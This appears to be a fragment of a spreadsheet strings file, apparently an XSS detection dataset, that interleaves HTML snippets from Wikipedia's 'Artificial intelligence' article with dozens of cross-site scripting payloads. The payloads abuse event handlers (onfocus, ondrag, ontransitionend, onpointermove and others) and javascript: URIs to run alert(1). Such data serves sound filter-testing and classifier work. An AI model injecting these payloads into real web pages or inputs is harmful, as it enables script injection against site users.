    <t>&lt;blockquote id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/blockquote&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-372"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-372"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;q onkeypress="alert(1)" contenteditable&gt;test&lt;/q&gt;</t>
  </si>
  <si>
    <t>&lt;tt id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/tt&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;embed id=x tabindex=1 onactivate=alert(1)&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Schmidhuber, J. (2015). "Deep Learning in Neural Networks: An Overview". &lt;i&gt;Neural Networks &lt;/i&gt;. &lt;b&gt;61 &lt;/b&gt;: 85–117. &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1404.7828"&gt;1404.7828 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Software_configuration_management" title="Software configuration management"&gt;Software configuration management &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;nobr ondragover=alert(1) contenteditable&gt;drop here&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;listing id=x tabindex=1 onactivate=alert(1)&gt;&lt;/listing&gt;</t>
  </si>
  <si>
    <t>&lt;article draggable="true" ondragend="alert(1)"&gt;test&lt;/article&gt;</t>
  </si>
  <si>
    <t>&lt;span onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/span&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;strong onmousedown="alert(1)"&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;dt onbeforecut="alert(1)" contenteditable&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;nav id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;thead onload=alert(1)&gt;&lt;/thead&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;div&gt;&lt;a href="/wiki/File:Shadow_Hand_Bulb_large.jpg" class="image"&gt;&lt;img alt="Shadow Hand Bulb large.jpg" src="//upload.wikimedia.org/wikipedia/commons/thumb/c/c5/Shadow_Hand_Bulb_large.jpg/100px-Shadow_Hand_Bulb_large.jpg" decoding="async" width="100" height="150" srcset="//upload.wikimedia.org/wikipedia/commons/thumb/c/c5/Shadow_Hand_Bulb_large.jpg/150px-Shadow_Hand_Bulb_large.jpg 1.5x, //upload.wikimedia.org/wikipedia/commons/thumb/c/c5/Shadow_Hand_Bulb_large.jpg/200px-Shadow_Hand_Bulb_large.jpg 2x" data-file-width="2560" data-file-height="3840" /&gt; &lt;/a&gt; &lt;/div&gt; &lt;/td&gt; &lt;/tr&gt;&lt;tr&gt;&lt;th scope="row" class="navbox-group" style="width:1%"&gt;&lt;a href="/wiki/Robot" title="Robot"&gt;Types &lt;/a&gt; &lt;/th&gt;&lt;td class="navbox-list navbox-even" style="text-align:left;border-left-width:2px;border-left-style:solid;width:100%;padding:0px"&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onmouseenter="alert(1)"&gt;test&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;IMG SRC="`&lt;javascript:alert&gt;`('')"</t>
  </si>
  <si>
    <t>&lt;source ondblclick="alert(1)"&gt;test&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;command onmousedown="alert(1)"&gt;test&lt;/command&gt;</t>
  </si>
  <si>
    <t>&lt;li onmouseleave="alert(1)"&gt;test&lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div id="mw-page-base" class="noprint"&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Galileo_Galilei" title="Galileo Galilei"&gt;Galileo Galilei &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;wbr onpointermove=alert(1)&gt;XSS&lt;/wbr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;h3 id="p-cactions-label"&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+Guardian&amp;amp;rft.atitle=Elon+Musk%3A+artificial+intelligence+is+our+biggest+existential+threat&amp;amp;rft.date=2014-10-27&amp;amp;rft.aulast=Gibbs&amp;amp;rft.aufirst=Samuel&amp;amp;rft_id=https%3A%2F%2Fwww.theguardian.com%2Ftechnology%2F2014%2Foct%2F27%2Felon-musk-artificial-intelligence-ai-biggest-existential-threat&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-58"&gt;&lt;a href="#Machine_ethics"&gt;&lt;span class="tocnumber"&gt;8.3.2 </t>
  </si>
  <si>
    <t>&lt;br onmouseout="alert(1)"&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/div&gt; &lt;/td&gt;&lt;td class="navbox-image" rowspan="6" style="width:1px;padding:0px 0px 0px 2px"&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;body id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;link draggable="true" ondragleave="alert(1)"&gt;test&lt;/link&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Science&amp;amp;rft.atitle=Artificial+intelligence+faces+reproducibility+crisis&amp;amp;rft.pages=725-726&amp;amp;rft.date=2018-02-16&amp;amp;rft_id=info%3Adoi%2F10.1126%2Fscience.359.6377.725&amp;amp;rft_id=info%3Abibcode%2F2018Sci...359..725H&amp;amp;rft.aulast=Hutson&amp;amp;rft.aufirst=Matthew&amp;amp;rft_id=http%3A%2F%2Fscience.sciencemag.org%2Fcontent%2F359%2F6377%2F725&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;template oncut="alert(1)" contenteditable&gt;test&lt;/template&gt;</t>
  </si>
  <si>
    <t>&lt;iframe onpointermove=alert(1)&gt;XSS&lt;/iframe&gt;</t>
  </si>
  <si>
    <t>&lt;label onmouseover="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;pre oncopy="alert(1)" contenteditable&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t>&lt;head onmouseout="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;nobr id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/nobr&gt;</t>
  </si>
  <si>
    <t>&lt;label onmouseenter="alert(1)"&gt;test&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck 2004 &lt;/a&gt;, pp.&amp;#160;131 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;source onpointerleave=alert(1)&gt;XSS&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;big draggable="true" ondragenter="alert(1)"&gt;test&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;optgroup oncontextmenu="alert(1)"&gt;test&lt;/optgroup&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;u style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_physics" title="Glossary of physics"&gt;Physics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Cognition" title="Cognition"&gt;Cognition &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;body id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/body&gt;</t>
  </si>
  <si>
    <t>&lt;applet id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/applet&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;code onbeforecut="alert(1)" contenteditable&gt;test&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;big onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/big&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;strong onkeypress="alert(1)" contenteditable&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="/wiki/Knowledge_representation_and_reasoning" title="Knowledge representation and reasoning"&gt;Knowledge reasoning &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;cite id=x tabindex=1 onfocus=alert(1)&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-338"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-338"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;/a&gt; &lt;/i&gt;&amp;#93; &lt;/sup&gt; These networks are trained one layer at a time. Ivakhnenko's 1971 paper&lt;sup id="cite_ref-ivak1971_253-0" class="reference"&gt;&lt;a href="#cite_note-ivak1971-253"&gt;&amp;#91;242&amp;#93; &lt;/a&gt; &lt;/sup&gt; describes the learning of a deep feedforward multilayer perceptron with eight layers, already much deeper than many later networks. In 2006, a publication by &lt;a href="/wiki/Geoffrey_Hinton" title="Geoffrey Hinton"&gt;Geoffrey Hinton &lt;/a&gt; and Ruslan Salakhutdinov introduced another way of pre-training many-layered &lt;a href="/wiki/Feedforward_neural_network" title="Feedforward neural network"&gt;feedforward neural networks &lt;/a&gt; (FNNs) one layer at a time, treating each layer in turn as an &lt;a href="/wiki/Unsupervised_learning" title="Unsupervised learning"&gt;unsupervised &lt;/a&gt; &lt;a href="/wiki/Restricted_Boltzmann_machine" title="Restricted Boltzmann machine"&gt;restricted Boltzmann machine &lt;/a&gt;, then using &lt;a href="/wiki/Supervised_learning" title="Supervised learning"&gt;supervised &lt;/a&gt; &lt;a href="/wiki/Backpropagation" title="Backpropagation"&gt;backpropagation &lt;/a&gt; for fine-tuning.&lt;sup id="cite_ref-FOOTNOTEHinton2007_254-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEHinton2007-254"&gt;&amp;#91;243&amp;#93; &lt;/a&gt; &lt;/sup&gt; Similar to shallow artificial neural networks, deep neural networks can model complex non-linear relationships. Over the last few years, advances in both machine learning algorithms and computer hardware have led to more efficient methods for training deep neural networks that contain many layers of non-linear hidden units and a very large output layer.&lt;sup id="cite_ref-255" class="reference"&gt;&lt;a href="#cite_note-255"&gt;&amp;#91;244&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Model-dependent_realism" title="Model-dependent realism"&gt;Model-dependent realism &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;i onmouseleave="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Robotic_mapping" title="Robotic mapping"&gt;Robotic mapping &lt;/a&gt; (localization, etc):</t>
  </si>
  <si>
    <t>&lt;command id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/command&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;pre onkeypress="alert(1)" contenteditable&gt;test&lt;/pre&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Mnih, Volodymyr; Kavukcuoglu, Koray; Silver, David; Rusu, Andrei A.; Veness, Joel; Bellemare, Marc G.; Graves, Alex; Riedmiller, Martin; Fidjeland, Andreas K.; Ostrovski, Georg; Petersen, Stig; Beattie, Charles; Sadik, Amir; Antonoglou, Ioannis; King, Helen; Kumaran, Dharshan; Wierstra, Daan; Legg, Shane; Hassabis, Demis (26 February 2015). "Human-level control through deep reinforcement learning". &lt;i&gt;Nature &lt;/i&gt;. &lt;b&gt;518 &lt;/b&gt; (7540): 529–533. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/2015Natur.518..529M"&gt;2015Natur.518..529M &lt;/a&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1038%2Fnature14236"&gt;10.1038/nature14236 &lt;/a&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/25719670"&gt;25719670 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Nature&amp;amp;rft.atitle=Human-level+control+through+deep+reinforcement+learning&amp;amp;rft.volume=518&amp;amp;rft.issue=7540&amp;amp;rft.pages=529-533&amp;amp;rft.date=2015-02-26&amp;amp;rft_id=info%3Apmid%2F25719670&amp;amp;rft_id=info%3Adoi%2F10.1038%2Fnature14236&amp;amp;rft_id=info%3Abibcode%2F2015Natur.518..529M&amp;amp;rft.aulast=Mnih&amp;amp;rft.aufirst=Volodymyr&amp;amp;rft.au=Kavukcuoglu%2C+Koray&amp;amp;rft.au=Silver%2C+David&amp;amp;rft.au=Rusu%2C+Andrei+A.&amp;amp;rft.au=Veness%2C+Joel&amp;amp;rft.au=Bellemare%2C+Marc+G.&amp;amp;rft.au=Graves%2C+Alex&amp;amp;rft.au=Riedmiller%2C+Martin&amp;amp;rft.au=Fidjeland%2C+Andreas+K.&amp;amp;rft.au=Ostrovski%2C+Georg&amp;amp;rft.au=Petersen%2C+Stig&amp;amp;rft.au=Beattie%2C+Charles&amp;amp;rft.au=Sadik%2C+Amir&amp;amp;rft.au=Antonoglou%2C+Ioannis&amp;amp;rft.au=King%2C+Helen&amp;amp;rft.au=Kumaran%2C+Dharshan&amp;amp;rft.au=Wierstra%2C+Daan&amp;amp;rft.au=Legg%2C+Shane&amp;amp;rft.au=Hassabis%2C+Demis&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-37"&gt;&lt;a href="#Automotive"&gt;&lt;span class="tocnumber"&gt;7.2 </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFRussellNorvig2003" class="citation"&gt;&lt;a href="/wiki/Stuart_J._Russell" title="Stuart J. Russell"&gt;Russell, Stuart J. &lt;/a&gt;; &lt;a href="/wiki/Peter_Norvig" title="Peter Norvig"&gt;Norvig, Peter &lt;/a&gt; (2003), &lt;a rel="nofollow" class="external text" href="http://aima.cs.berkeley.edu/"&gt;&lt;i&gt;Artificial Intelligence: A Modern Approach &lt;/i&gt; &lt;/a&gt; (2nd ed.), Upper Saddle River, New Jersey: Prentice Hall, &lt;a href="/wiki/International_Standard_Book_Number" title="International Standard Book Number"&gt;ISBN &lt;/a&gt;&amp;#160;&lt;a href="/wiki/Special:BookSources/0-13-790395-2" title="Special:BookSources/0-13-790395-2"&gt;&lt;bdi&gt;0-13-790395-2 &lt;/bdi&gt; &lt;/a&gt; &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Abook&amp;amp;rft.genre=book&amp;amp;rft.btitle=Artificial+Intelligence%3A+A+Modern+Approach&amp;amp;rft.place=Upper+Saddle+River%2C+New+Jersey&amp;amp;rft.edition=2nd&amp;amp;rft.pub=Prentice+Hall&amp;amp;rft.date=2003&amp;amp;rft.isbn=0-13-790395-2&amp;amp;rft.aulast=Russell&amp;amp;rft.aufirst=Stuart+J.&amp;amp;rft.au=Norvig%2C+Peter&amp;amp;rft_id=http%3A%2F%2Faima.cs.berkeley.edu%2F&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;See the &lt;a href="/wiki/Dartmouth_Workshop" class="mw-redirect" title="Dartmouth Workshop"&gt;Dartmouth proposal &lt;/a&gt;, under &lt;a href="#Philosophy"&gt;Philosophy &lt;/a&gt;, below. </t>
  </si>
  <si>
    <t>&lt;slot id=x tabindex=1 onactivate=alert(1)&gt;&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;base style="animation-name:x" onanimationend="alert(1)"&gt;&lt;/base&gt;</t>
  </si>
  <si>
    <t>SRC="javascript:alert('')</t>
  </si>
  <si>
    <t>&lt;slot onbeforecut="alert(1)" contenteditable&gt;test&lt;/slot&gt;</t>
  </si>
  <si>
    <t>&lt;ol onkeyup="alert(1)" contenteditable&gt;test&lt;/ol&gt;</t>
  </si>
  <si>
    <t>&lt;tbody onpointerup=alert(1)&gt;XSS&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;cite id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;del onpaste="alert(1)" contenteditable&gt;test&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;&lt;SCRIPT&gt;alert("");//\&lt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;i&gt;Proceedings of the SPIE AeroSense Session on Unmanned Ground Vehicle Technology &lt;/i&gt;. Unmanned Ground Vehicle Technology IV. &lt;b&gt;3693 &lt;/b&gt;. pp.&amp;#160;11–20. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/2002SPIE.4715..303A"&gt;2002SPIE.4715..303A &lt;/a&gt;. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.15.14"&gt;10.1.1.15.14 &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=31" title="Edit section: Artificial neural networks"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;spacer id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/spacer&gt;</t>
  </si>
  <si>
    <t>&lt;address onbeforecut="alert(1)" contenteditable&gt;test&lt;/address&gt;</t>
  </si>
  <si>
    <t>&lt;dt onmouseleave="alert(1)"&gt;test&lt;/dt&gt;</t>
  </si>
  <si>
    <t>&lt;s onmouseout="alert(1)"&gt;test&lt;/s&gt;</t>
  </si>
  <si>
    <t>&lt;header id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/header&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFKolata1982" class="citation journal"&gt;Kolata, G. (1982). "How can computers get common sense?". &lt;i&gt;Science &lt;/i&gt;. &lt;b&gt;217 &lt;/b&gt; (4566): 1237–1238. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/1982Sci...217.1237K"&gt;1982Sci...217.1237K &lt;/a&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1126%2Fscience.217.4566.1237"&gt;10.1126/science.217.4566.1237 &lt;/a&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/17837639"&gt;17837639 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Science&amp;amp;rft.atitle=How+can+computers+get+common+sense%3F&amp;amp;rft.volume=217&amp;amp;rft.issue=4566&amp;amp;rft.pages=1237-1238&amp;amp;rft.date=1982&amp;amp;rft_id=info%3Apmid%2F17837639&amp;amp;rft_id=info%3Adoi%2F10.1126%2Fscience.217.4566.1237&amp;amp;rft_id=info%3Abibcode%2F1982Sci...217.1237K&amp;amp;rft.aulast=Kolata&amp;amp;rft.aufirst=G.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;section onkeydown="alert(1)" contenteditable&gt;test&lt;/section&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Paradigm" title="Paradigm"&gt;Paradigm &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;td ondrop=alert(1) contenteditable&gt;drop here&lt;/td&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Wendell Wallach introduced the concept of &lt;a href="/wiki/Artificial_moral_agents" class="mw-redirect" title="Artificial moral agents"&gt;artificial moral agents &lt;/a&gt; (AMA) in his book &lt;i&gt;Moral Machines &lt;/i&gt;&lt;sup id="cite_ref-393" class="reference"&gt;&lt;a href="#cite_note-393"&gt;&amp;#91;382&amp;#93; &lt;/a&gt; &lt;/sup&gt; For Wallach, AMAs have become a part of the research landscape of artificial intelligence as guided by its two central questions which he identifies as "Does Humanity Want Computers Making Moral Decisions"&lt;sup id="cite_ref-394" class="reference"&gt;&lt;a href="#cite_note-394"&gt;&amp;#91;383&amp;#93; &lt;/a&gt; &lt;/sup&gt; and "Can (Ro)bots Really Be Moral".&lt;sup id="cite_ref-395" class="reference"&gt;&lt;a href="#cite_note-395"&gt;&amp;#91;384&amp;#93; &lt;/a&gt; &lt;/sup&gt; For Wallach the question is not centered on the issue of &lt;i&gt;whether &lt;/i&gt; machines can demonstrate the equivalent of moral behavior in contrast to the &lt;i&gt;constraints &lt;/i&gt; which society may place on the development of AMAs.&lt;sup id="cite_ref-396" class="reference"&gt;&lt;a href="#cite_note-396"&gt;&amp;#91;385&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;Anderson, Susan Leigh. "Asimov's "three laws of robotics" and machine metaethics." AI &amp;amp; Society 22.4 (2008): 477–493. </t>
  </si>
  <si>
    <t>&lt;link rel="alternate" type="application/atom+xml" title="Wikipedia Atom feed" href="/w/index.php?title=Special:RecentChanges&amp;amp;feed=atom"/&gt;</t>
  </si>
  <si>
    <t>&lt;rp onpointerenter=alert(1)&gt;XSS&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;body onbeforeunload="location='javascript:alert(1)'"&gt;</t>
  </si>
  <si>
    <t>&lt;svg onload=alert(1)&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Speech_recognition-125"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Speech_recognition_125-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=The+New+York+Times&amp;amp;rft.atitle=Computer+Wins+on+%27Jeopardy%21%27%3A+Trivial%2C+It%27s+Not&amp;amp;rft.date=2011-02-16&amp;amp;rft.aulast=Markoff&amp;amp;rft.aufirst=John&amp;amp;rft_id=https%3A%2F%2Fwww.nytimes.com%2F2011%2F02%2F17%2Fscience%2F17jeopardy-watson.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;dt&gt;&lt;a class="reference internal" href="topics/loaders.html"&gt;&lt;span class="doc"&gt;Item Loaders</t>
  </si>
  <si>
    <t>&lt;bdo oncontextmenu="alert(1)"&gt;test&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;article id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/article&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;bdo onpointerover=alert(1)&gt;XSS&lt;/bdo&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-graves2006-267"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-graves2006_267-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;plaintext onpaste="alert(1)" contenteditable&gt;test&lt;/plaintext&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Constructivist_epistemology" title="Constructivist epistemology"&gt;Constructivist epistemology &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;track oncontextmenu="alert(1)"&gt;test&lt;/track&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation news"&gt;&lt;a rel="nofollow" class="external text" href="http://autoweek.com/article/technology/fully-autonomous-vehicles-are-more-decade-down-road"&gt;"Don't worry: Autonomous cars aren't coming tomorrow (or next year)" &lt;/a&gt;. &lt;i&gt;Autoweek &lt;/i&gt;. 2016&lt;span class="reference-accessdate"&gt;. Retrieved &lt;span class="nowrap"&gt;24 March </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-33"&gt;&lt;a href="#Deep_recurrent_neural_networks"&gt;&lt;span class="tocnumber"&gt;6.5.2 </t>
  </si>
  <si>
    <t>&lt;rp onpaste="alert(1)" contenteditable&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Neats_vs._scruffies-17"&gt;&lt;span class="mw-cite-backlink"&gt;^ &lt;a href="#cite_ref-Neats_vs._scruffies_17-0"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;a &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Neats_vs._scruffies_17-1"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;b &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; &lt;a href="#cite_ref-Neats_vs._scruffies_17-2"&gt;&lt;sup&gt;&lt;i&gt;&lt;b&gt;c &lt;/b&gt; &lt;/i&gt; &lt;/sup&gt; &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a rel="nofollow" class="external text" href="http://aitopics.org/"&gt;AITopics &lt;/a&gt; – A large directory of links and other resources maintained by the &lt;a href="/wiki/Association_for_the_Advancement_of_Artificial_Intelligence" title="Association for the Advancement of Artificial Intelligence"&gt;Association for the Advancement of Artificial Intelligence &lt;/a&gt;, the leading organization of academic AI researchers. &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;bgsound onpointerenter=alert(1)&gt;XSS&lt;/bgsound&gt;</t>
  </si>
  <si>
    <t>&lt;caption onpointerout=alert(1)&gt;XSS&lt;/caption&gt;</t>
  </si>
  <si>
    <t>setTimeout(\\"writetitle()\\",$\_GET\[\])</t>
  </si>
  <si>
